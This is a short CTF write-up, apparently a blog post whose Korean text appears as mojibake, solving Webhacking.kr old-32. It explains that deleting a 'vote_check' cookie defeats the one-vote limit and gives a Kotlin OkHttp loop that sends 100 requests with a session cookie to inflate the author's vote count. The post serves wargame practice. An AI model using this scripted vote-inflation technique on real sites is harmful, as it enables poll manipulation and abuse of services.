SECURITY/Webhacking

Webhacking.kr :: old-32๋ฒˆ

\b\t 2021. 2. 2. 13:38

์ •๋ง ๊ท€์—ฌ์šด ๋ฌธ์ œ๋‹ค.

 

์ผ๋‹จ ๋“ค์–ด๊ฐ€๋ฉด ์œ ์ €๋“ค๊ณผ vote ๊ฐ€ ์žˆ๋Š”๋ฐ ์ด๋ฆ„์„ ๋ˆ„๋ฅด๋ฉด vote ๋˜๊ณ , ๊ทธ ์‚ฌ๋žŒ์˜ vote ์ˆ˜๊ฐ€ ๋Š˜์–ด๋‚œ๋‹ค.

๊ทผ๋ฐ ํ•œ ๋ฒˆ vote ํ•˜๋ฉด you already voted ๊ฐ€ ๋œจ๋ฉด์„œ vote ๊ฐ€ ์•ˆ๋œ๋‹ค.

cookie ๋ฅผ ์‚ดํŽด๋ณด๋‹ˆ, ์—ญ์‹œ๋‚˜ vote_check ๋ผ๋Š” cookie ๊ฐ€ ์žˆ์Œ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

๊ทธ๋ž˜์„œ ์ด๊ฑธ ์‚ญ์ œํ•ด์ฃผ๋ฉด ๋‹ค์‹œ vote ํ•  ์ˆ˜ ์žˆ๋‹ค.

 

๊ทธ๋Ÿฌ๋‹ˆ.. ์ž์‹ ์˜ ์•„์ด๋””๋ฅผ ์ฐพ์•„์„œ ๊ทธ๊ฑธ 100 ๊นŒ์ง€ ์˜ฌ๋ฆฌ๋ฉด ๋œ๋‹ค. ใ…Ž

 

(์•„์ฃผ ์•„๋ž˜์— ์žˆ๋Š” ๋‚ด ์•„์ด๋””..)

๊ทผ๋ฐ ์ฟ ํ‚ค ์‚ญ์ œ -> vote ๋ฅผ 100๋ฒˆ ๋ฐ˜๋ณตํ•˜์ž๋‹ˆ ๋„ˆ๋ฌด ๊ท€์ฐฎ์•„์„œ ์ฝ”๋“œ๋ฅผ ์งœ๊ธฐ๋กœ ํ–ˆ๋‹ค.

cookie ์™€ ํ•จ๊ป˜ GET Request ๋ฅผ ๋ณด๋‚ด๋Š” ๋ฐฉ๋ฒ•์„ stackoverflow ์—์„œ ์ฐธ๊ณ ํ•ด์„œ ์ž‘์„ฑํ•˜์˜€๋‹ค.

(stackoverflow.com/questions/35743291/add-cookie-to-client-request-okhttp)

(์ž‘์„ฑ ์–ธ์–ด๋Š” kotlin)

fun simpleReq(){
        val url : String = "https://webhacking.kr/challenge/code-5/?hit=MY_ID"
        val cookieName = "PHPSESSID"
        val cookieValue = MY_COOKIE_VALUE

        for(i in 1..100){
            try {
                var cookieHelper : OkHttp3CookieHelper = OkHttp3CookieHelper()
                cookieHelper.setCookie(url, cookieName, cookieValue)

                val client = OkHttpClient.Builder().cookieJar(cookieHelper.cookieJar()).build()
                val request = Request.Builder().url(url).build()
                val response = client.newCall(request).execute()
                println("successful:: ${response.isSuccessful}")

            }catch (e: Exception){
                e.printStackTrace()
            }
        }

    }

 

์ด ์ฝ”๋“œ๋ฅผ ์‹คํ–‰์‹œํ‚ค๊ณ  ๋ฌธ์ œ ํŽ˜์ด์ง€๋ฅผ ์ƒˆ๋กœ ๊ณ ์นจํ•˜๋‹ˆ๊นŒ vote ์ˆ˜๊ฐ€ ๋งˆ๊ตฌ๋งˆ๊ตฌ ์˜ฌ๋ผ๊ฐ”๋‹ค ใ…Ž

 

๊ทธ๋ฆฌ๊ณ  ๋‹ค ๋๋‚˜๊ณ  ์ƒˆ๋กœ๊ณ ์นจํ•˜๋‹ˆ๊นŒ

๊ฐ€ ๋–ณ๋‹ค~ ๋!